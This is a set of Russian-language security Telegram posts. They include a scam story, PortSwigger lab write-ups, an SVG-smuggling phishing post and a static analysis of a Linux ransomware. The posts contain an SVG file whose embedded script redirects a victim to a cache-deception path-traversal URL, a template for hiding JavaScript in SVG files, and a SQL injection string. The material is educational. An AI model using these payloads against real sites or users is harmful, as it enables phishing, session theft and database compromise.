Привет^3
Мне кажется, что всю удачу я променял на магнит для скаммеров. И так...
Мне написали с невероятно привлекательным предложением легко заработка в интернете. "Да кем я себя возомнил, чтобы отказаться от этого" - подумал я. Из важных вопросов был возраст и имя. Важно, чтобы возраст был больше 18.
Далее мне описали суть работы. Нужно повышать популярность отлей. Для этого нужно переходить по ссылкам и отправлять скриншоты. Работа не пыльная, смысла в ней тоже мало. Отправил 5 скринов. Теперь нужно связаться с другим менеджером для получения ЗП) Мне выдали код, который является последними 4 цифрами моего номера телефона. Совпадение - не думаю) И вот мне уже обещают 300 р. Перевел их мне на карту какой-то рандомный человек.
На второй день мне предложили зарабатывать "реальные деньги". Подсев на иглу легких денег я согласился) И вот, градус повышается. Теперь нужно бронировать номера, чтобы эмитировать загруженность. "Бронь" будут "отменять", а на "счет" будет начислен возврат и комиссия. Но для брони нужны деньги, подумает вы. И будете чертовски правы) Поэтому нужно выбрать сумму залога и отправить ее на номер картыни разу не подозрительно, но да ладно. Я выбрал 570 р. Думаю, что хватит на люкс)) Дальше только интереснее!
Нужно зарегистрироваться на сайте для бронированияМилорд, нужно больше золота. Бюджет на скамеров был исчерпан.
Итог. Я написал, что у меня нет денег и стал им не интересен. Есть мысль поковырять сайт и, по возможности, найти ручку для увеличения баланса, чтобы вернуться в эту историю для выяснения подробностей. Вся схема похожа на отмывание денег или проделки кардеров. В какой-то момент вас могут просто кинуть на те деньги, что были переведены другим людям. Так же может быть заблокирован ваш счет, если кто-то из жертв пожалуется(у меня есть ощущение, что жертвы сами перекидывают друг-другу деньги). Так же я приучил менеджера открывать
Будте аккуратны и не ведитесь на легкую наживу)
#memes #story_time
@coffee_cube
Мне кажется, что всю удачу я променял на магнит для скаммеров. И так...
Мне написали с невероятно привлекательным предложением легко заработка в интернете. "Да кем я себя возомнил, чтобы отказаться от этого" - подумал я. Из важных вопросов был возраст и имя. Важно, чтобы возраст был больше 18.
Далее мне описали суть работы. Нужно повышать популярность отлей. Для этого нужно переходить по ссылкам и отправлять скриншоты. Работа не пыльная, смысла в ней тоже мало. Отправил 5 скринов. Теперь нужно связаться с другим менеджером для получения ЗП) Мне выдали код, который является последними 4 цифрами моего номера телефона. Совпадение - не думаю) И вот мне уже обещают 300 р. Перевел их мне на карту какой-то рандомный человек.
На второй день мне предложили зарабатывать "реальные деньги". Подсев на иглу легких денег я согласился) И вот, градус повышается. Теперь нужно бронировать номера, чтобы эмитировать загруженность. "Бронь" будут "отменять", а на "счет" будет начислен возврат и комиссия. Но для брони нужны деньги, подумает вы. И будете чертовски правы) Поэтому нужно выбрать сумму залога и отправить ее на номер карты
Нужно зарегистрироваться на сайте для бронирования
https://www.radisson.top/. Внешний вид сайта выглядит ни разу не подозрительно. Очень плохая верстка, никакой валидации логина, почты, номера телефона. Ну это им и не нужно. Дальше нужно играть в игру: жмакаешь на кнопку получения заказа, клацаешь забронировать - все. Профит. Но я же говорил, что мне везет. Так вот, мне выпал чудесный номер за 4500 для бронирования с повышенной комиссией, но, к сожалению, на моем балансе нет денег для оплаты Итог. Я написал, что у меня нет денег и стал им не интересен. Есть мысль поковырять сайт и, по возможности, найти ручку для увеличения баланса, чтобы вернуться в эту историю для выяснения подробностей. Вся схема похожа на отмывание денег или проделки кардеров. В какой-то момент вас могут просто кинуть на те деньги, что были переведены другим людям. Так же может быть заблокирован ваш счет, если кто-то из жертв пожалуется(у меня есть ощущение, что жертвы сами перекидывают друг-другу деньги). Так же я приучил менеджера открывать
pdf файлы, что может пригодиться в будущем.Будте аккуратны и не ведитесь на легкую наживу)
#memes #story_time
@coffee_cube
🔥5✍4🤡1👨💻1👀1💅1
Exploiting_origin_server_normalization_for_web_cache_deception.pdf
421.6 KB
Привет^3
Продолжаю выкладывать райтапы на лабы по
Код
#web #writeup
@coffee_cube
Продолжаю выкладывать райтапы на лабы по
Web cache deception. Код
svg файлы вынесу сюда:
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "https://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg height="100%" version="1.1" viewBox="0 0 1700 863" width="100%" xml:space="preserve"
xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink">
<image height="863" id="Image" width="1700" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAIAAAAC64paAAAEz0lEQVR4nAHEBDv7AAxxUTd8YtLTcEaHx40ZIJK60obC5Ou1cLF+TS4/XVlRSmvVi/w8Ca2/8IQgN1t1Vnz2z4Qbhi41a9vUGAAdrSE1KG1/JVhVWHa4MMlbjStnEqyHAJ955H/P5KELCfoLxZfvMBXHOrF5zXHK2FQDizWDvG8AL/aju1MAPftmRhxjuzxxxxwr6/sTuNGCrXbDgrp8f8pF4XXBCEmwevYo0UZcWY8m8y7drro6Fyfn/IZhDuf1Sra3ABF+HBy+0XxXRZPGpTTfOjn2WtbN6h3k3ZDaqjVIrcc2nzDsXX50RAmZWqJP/udjDRsBKoHV1tiUzBeO+AAPUxxJoPg1+LVX0ZGGuREcxlbsasPf3V88wgpJOvEe7/QM9Hygg1HYJEIi0/ELhzseWQyUEVX/5KFxcAYAGGSIkEfp0R2p8/iekqmiWWqmx4UJkbv79HhBPEmjcWrMq6OnnQlOlqlw45AKt7FYqns9bm2RKcaIXJKsAJfNE+IyVXL8eq752OYiBqePXfd5N/yVih9sbDBKGczO78uVB1hJPCV+YBWtBNpQ6vZHOyB5m9oZXr8+sACMrWSnXLEdiLu3S20yGUdFLJU1auqh7OUvMdi6FmGLjkMIz+qDNfLibseIgyNhHJjE5CLZpJ8fmQ/cRd8A7cTTpcVgtzIbWOcASAT8WePb1RfDQtTm7zJrFqLslkdMnDHBHv1w43qYv0EXDx/UTRRav8hpToTpGztfADmSJNLe+I/qQgntVRu+8YHIot93eGUgAAIPBUr/ALoq0TghgQKgT4tVSjOSRqV4Od243GfoLQ4uY+0t1QB5ktSY7avPeAitGgVwZ2YdbC8qijR5JZx6QuVAr87H03yNKyeLR7UMae5XGPLKnjee0NvDCCOQxQcPUMsAZl11CIYce3xIb/xyhTT6wV6H0XOF8My6bnS+WaEVFStSW0zoTRT2eFHMXq45KCN3aOA19/BVG0i9/DPuAP4Z833YYQN+QzXZYagmlb9vBHXZ0MJCBIfvs43jV1l1AXubIPVot5j9K5zkmu9IvFWES9C614mfBoN4dwASTMvwX+y63gzmNUzx1IIzdXJnlTxqJgWAEz8KyKSyOTXY8s5mC0f1H/zDXOIzE5iyGG1RODjQCJFLLOwA6+J5ZIlRkIXofOGOoHfNWGHZ2kH1c2ueLcw1T57fSw5D1/9n05ZeUUWpKLEYwCws8jAZm2/01M9bxbX5AGgdzTS6EW7F2YduQvY4YmfEYJ2XznsR3mU9L4ecSPLKCzuIAqkL9hN8eYlQwKAhhTFHqM15tRk6m6iR0wD2wNoLzCWjhF2SE67i0iEH/WGUt7KhRDiDslK6+KtX+tAVfSUi+NGE8JHUYjjotuk9eGKf+y0AvQcCJn0AtyEQZ5F//iLAZ1YdBSZ2K6+UXohWsjyz/5eVXJs45k3l85Lwxi/9rStDJCrpJ1Qul5wvG/juezX0KX23ADCzfLib3CQrgKhayon7oOZULnNkgKgkbIqgvqpzPVCRbTCgOi5lO6e/iSSFL3tlJYNrP1q4HBrF7MAEeQAUThoWm+8dYpYVW6ZKsNj8De13cqJXziBtn3iNoc60ZkmD3x0IcwQG+tKp/a3eGmz6dWpiv/Mm0G5hl0xSGlKET0w0lQAAAABJRU5ErkJggg=="/>
<script type="text/javascript">
<![CDATA[
document.location="https://0aef000f03f69da48140110400a500fc.web-security-academy.net/resources/123/..%2f..%2fmy-account"
]]>
</script>
</svg>
#web #writeup
@coffee_cube
👨💻2🦄2👍1🔥1😎1
Привет^3
Мне не нравится экспорт
✏️разбор
#web #writeup
@cofee_cube
Мне не нравится экспорт
markdown в pdf, поэтому сегодня попробую загрузить отчет через github. Продолжаю выкладывать разборы лаб направленных на кэширование динамических ресурсов. Отпишите в комменты, если так читать удобнее.✏️разбор
#web #writeup
@cofee_cube
🔥3👍2✍1❤1👨💻1
Привет^3
Продолжаю выкладывать райтапы на лабы
✏️Разбор
#web #writeup
@coffee_cube
Продолжаю выкладывать райтапы на лабы
Port Swigger. Последнее время ковырялся с ядром линукс. Нашел одну интересную штку, связанную с переменными окружения. Позже опишу, что у меня вышло)✏️Разбор
#web #writeup
@coffee_cube
🤔4❤2🔥1👀1
Привет^3
Вот очередной разбор, в котором необходимо крутить
✏️Разбор
#web #writeup
@coffee_cube
Вот очередной разбор, в котором необходимо крутить
SQL инъекцию 💉✏️Разбор
#web #writeup
@coffee_cube
👨💻2❤1✍1🔥1
Привет^3
Сегодня хочу рассказать про
Данный формат файл поддерживате
Пример использования можно посмотеть туть.
#phishing
@coffee_cube
Сегодня хочу рассказать про
SVG Smuggilng .SVG - это один из видов графики, который формируется с помощью геометрических объектов: линий, кругов, прямоугольников, кривых и прочих элементов.
Данный формат файл поддерживате
JavaScript код, который можно указать в блоке <![DATA[]]>. Сам формат файла следующий:
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "https://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg height="100%" version="1.1" viewBox="0 0 1700 863" width="100%" xml:space="preserve"
xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink">
<image height="863" id="Image" width="1700" xlink:href="data:image/png;base64,<base64 png>"/>
<script type="text/javascript">
<![CDATA[
alert('Smuggle code here');
]]>
</script>
</svg>
Пример использования можно посмотеть туть.
#phishing
@coffee_cube
👍3👨💻1
Привет^3
А вот и следующий разбор на тему
✏️Разбор
#web #writeup
@coffee_cube
А вот и следующий разбор на тему
SQL инъекций. Хочу попробовать выкладывать разборы пачкой на одну тему. Как вам идея?✏️Разбор
#web #writeup
@coffee_cube
👨💻6✍1
Привет^3
Прошло где-то два месяца с последнего поста. За это время произошло много весёлого и интересного — и в работе, и в жизни в целом. Наконец-то возвращаюсь к постингу )
Я решил, что хочу выкладывать более объёмные посты, которые сам написал. Репостить рандомные новости из других ИБ-каналов мне не особо интересно. Поставил себе цель — опубликовать несколько статей в журналечтобы получить бесплатную подписку. Над одной из них уже начал работу. Выходит довольно забавный ресерч. Поэтому буду стараться делать больше ресерчей, чтобы вам было что почитать.
Идея вкатиться в баг-баунти никуда не делась, так что продолжал решать задачки на
Так что — ожидайте :3
@coffee_cube
Прошло где-то два месяца с последнего поста. За это время произошло много весёлого и интересного — и в работе, и в жизни в целом. Наконец-то возвращаюсь к постингу )
Я решил, что хочу выкладывать более объёмные посты, которые сам написал. Репостить рандомные новости из других ИБ-каналов мне не особо интересно. Поставил себе цель — опубликовать несколько статей в журнале
xaker Идея вкатиться в баг-баунти никуда не делась, так что продолжал решать задачки на
Port Swigger Academy. Теперь буду постить решения паком.Так что — ожидайте :3
@coffee_cube
2❤7⚡3🤝2❤🔥1👍1🍓1😎1
Привет^3
Сегодня будет подборка лаб по
Причиной такой уязвимости является отсутствие фильтрации, или недостаточно хорошая фильтрация входящих данных. То есть, для обнаружения инъекции нужно найти точку входа - те места, где можно подставлять данные. Например форма входа на сайт, поиск по сайту, отправка комментария и т. п.
📎Пример
Пусть у нас будет следующий запрос к БД на стороне сервера:
Предположим, значение
Список разборов:
✏️SQL injection attack, listing the database contents on Oracle
✏️SQL injection attack, listing the database contents on non-Oracle databases
✏️SQL injection attack, querying the database type and version on MySQL and Microsoft
✏️SQL injection attack, querying the database type and version on Oracle
✏️SQL injection vulnerability allowing login bypass
✏️SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
#web #writeup
@coffee_cube
Сегодня будет подборка лаб по
SQL-инъекциям.SQL-инъекция - это внедрение произвольного SQL-запроса к базе данных. Такая возможность отправки запроса, означает ошибку безопасности, допущенную разработчиком при написании кода. Наличие данной уязвимости может привести к краже конфиденциальной информации из БД. Входит в OWASP TOP 10. Причиной такой уязвимости является отсутствие фильтрации, или недостаточно хорошая фильтрация входящих данных. То есть, для обнаружения инъекции нужно найти точку входа - те места, где можно подставлять данные. Например форма входа на сайт, поиск по сайту, отправка комментария и т. п.
📎Пример
Пусть у нас будет следующий запрос к БД на стороне сервера:
SELECT * FROM news WHERE id='id'
Предположим, значение
id мы можем контролировать. Значит, передав в id следующую строку 1' or true-- -, мы изменим логику запроса.
SELECT * FROM news WHERE id='1' or true-- -'
Список разборов:
✏️SQL injection attack, listing the database contents on Oracle
✏️SQL injection attack, listing the database contents on non-Oracle databases
✏️SQL injection attack, querying the database type and version on MySQL and Microsoft
✏️SQL injection attack, querying the database type and version on Oracle
✏️SQL injection vulnerability allowing login bypass
✏️SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
#web #writeup
@coffee_cube
🔥5❤3😎2👍1👨💻1
Вот что у человека могло случиться в 05:33, что внезапно понадобился взлом ТГ? В 5 утра, Карл...
#memes
@coffee_cube
#memes
@coffee_cube
1🗿7🥰1😁1👨💻1💅1
Привет^3🦠
Сегодня покажу вам разбор несложной малвари под
Реверс-инжиниринг помогает разобраться в том, как работает ВПО(вредоносное программное обеспечение). Более подробно можно почитать туть.
При анализе малвары мне нравится извелкать интересные приемы, которые в ней используются. А далее воспроизводить их для дальнейшего детектаи забавы ради.
Обычно проводится статический и динамический анализ для полного понимания алгоритма работы программы.
В этом посте я проведу статический анализ. Динамический анализ и небольшой интерактивчик будет на следующей неделе:3
▪︎ Первым делом
Обычно я смотрю файл через утилиту Detect It Easy. Вот ее вывод:
Выглядит так, что таблица символов не удалена, поэтому можно сразу найти
▪︎ main
В функции
Далее в бесконечном цикле вызывается функция
▪︎ do_heartbeat()
Из функции можно извлечь все директории, с которыми малвара взимодействует. (скриншот 2)
▪︎ find
Конечно же следом пойду смотреть фунцию
Алгоритм функции достаточно простой:
1. Открывает директорию и проходится по всем файлам в ней. Если это
2. Вызвает функцию
3. Далее происходит вызов
▪︎ CreatRadMe
Ничего особо интересного тут нет. Просто создается файл со следующим содержанием. (скриншот 4)
▪︎ EncrFile
Думаю, что ключевая функция во всем малваре -
По сути для файла изменяются права с помощью
Файл шифрутеся с помощью алгоритма
▪︎ Итог
Я провел статический анализ не сложного шифровальщика-демона(такие бываю не часто, но об этом напишу позже❤️). Так как ключ хранится рядом с зашифрованным файлом, то мы можем написать дешифровшик. Динамическим анализом и написанием дешифровшика мы займемся в следующий вторник. Так что ожидайте с нетерпением:3
#malware #linux
@coffee_cube
Сегодня покажу вам разбор несложной малвари под
Linux.Реверс-инжиниринг помогает разобраться в том, как работает ВПО(вредоносное программное обеспечение). Более подробно можно почитать туть.
При анализе малвары мне нравится извелкать интересные приемы, которые в ней используются. А далее воспроизводить их для дальнейшего детекта
Обычно проводится статический и динамический анализ для полного понимания алгоритма работы программы.
В этом посте я проведу статический анализ. Динамический анализ и небольшой интерактивчик будет на следующей неделе:3
▪︎ Первым делом
Обычно я смотрю файл через утилиту Detect It Easy. Вот ее вывод:
Info:
Size: 1028096
File type: ELF32
String: ELF(386)
Extension: elf
Operation system: Red Hat Linux(ABI: 2.6.9)
Architecture: 386
Mode: 32-bit
Type: EXEC
Endianness: LE
Выглядит так, что таблица символов не удалена, поэтому можно сразу найти
main. Закидываб бинарь в IDA Pro▪︎ main
В функции
main происходит создание процесса-демона с вызовом chroot() в корневую директорию /. (скриншот 1)Далее в бесконечном цикле вызывается функция
do_heartbeat().▪︎ do_heartbeat()
Из функции можно извлечь все директории, с которыми малвара взимодействует. (скриншот 2)
/u01, /u02, /u03, /u04 - это часто используемые точки монтирования в Linux при работе с базами данных Oracle.▪︎ find
Конечно же следом пойду смотреть фунцию
find. (скриншот 3)Алгоритм функции достаточно простой:
1. Открывает директорию и проходится по всем файлам в ней. Если это
. или .., то их пропускает;2. Вызвает функцию
CreatRadMe (да-да, это не опечатка). По названию понятно, что создается README файл (скриншот 4);3. Далее происходит вызов
EncrFile, если не находит подстроку C_I_0P в пути до файла. Если же это директория, то рекурсивно вызывается find;▪︎ CreatRadMe
Ничего особо интересного тут нет. Просто создается файл со следующим содержанием. (скриншот 4)
▪︎ EncrFile
Думаю, что ключевая функция во всем малваре -
EncrFile. (скриншот 5)По сути для файла изменяются права с помощью
chmod() на rw-------. Эти же права используются далее для работы с файлами. Файл шифрутеся с помощью алгоритма
rc4. Ключ генерируется для каждого файла отдельно, и, что интересно, записывается в файл рядом с раширением .C_I_0P с помощью функции CreateKey. Это означает, что получится эти файлы расшифровать) При этом шифруется максимум 100000000 байт файла.▪︎ Итог
Я провел статический анализ не сложного шифровальщика-демона(такие бываю не часто, но об этом напишу позже❤️). Так как ключ хранится рядом с зашифрованным файлом, то мы можем написать дешифровшик. Динамическим анализом и написанием дешифровшика мы займемся в следующий вторник. Так что ожидайте с нетерпением:3
#malware #linux
@coffee_cube
1🤝5👨💻4❤2👍2✍1❤🔥1